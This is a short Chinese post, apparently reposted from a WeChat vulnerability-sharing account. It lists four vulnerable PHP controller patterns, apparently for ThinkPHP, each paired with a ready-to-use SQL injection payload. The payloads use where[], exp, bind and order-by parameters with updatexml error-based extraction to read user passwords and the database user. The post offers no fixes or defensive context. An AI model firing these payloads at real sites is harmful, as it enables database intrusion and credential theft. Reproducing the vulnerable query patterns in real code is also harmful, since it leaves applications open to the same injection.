0x1 源码写法
[PHP] 纯文本查看 复制代码 public function index()
{
$data = M('users')->find(I('GET.id'));
var_dump($data);
}
exp
[AppleScript] 纯文本查看 复制代码 ?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)#
0x2 写法
[AppleScript] 纯文本查看 复制代码 public function index()
{
$User = D('Users');
$map = array('id' => $_GET['id']);
$user = $User->where($map)->find();
}
exp [AppleScript] 纯文本查看 复制代码 id[0]=exp&id[1]==1 and updatexml(1,concat(0x7e,user(),0x7e),1)
0x3 写法
[AppleScript] 纯文本查看 复制代码 public function index()
{
$User = M("User");
$user['id'] = I('id');
$data['password'] = I('password');
$valu = $User->where($user)->save($data);
var_dump($valu);
}
exp [AppleScript] 纯文本查看 复制代码 ?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)&password=1
0x4写法 [AppleScript] 纯文本查看 复制代码 public function index()
{
$User = M("User");
$order_by = I('get.order');
$q = $User->where('id','1')->order($order_by)->find();
var_dump($q);
}
[AppleScript] 纯文本查看 复制代码 ?order[updatexml(1,concat(0x3a,user()),1)]
文章来自微信公众号,漏洞推送欢迎大家关注
|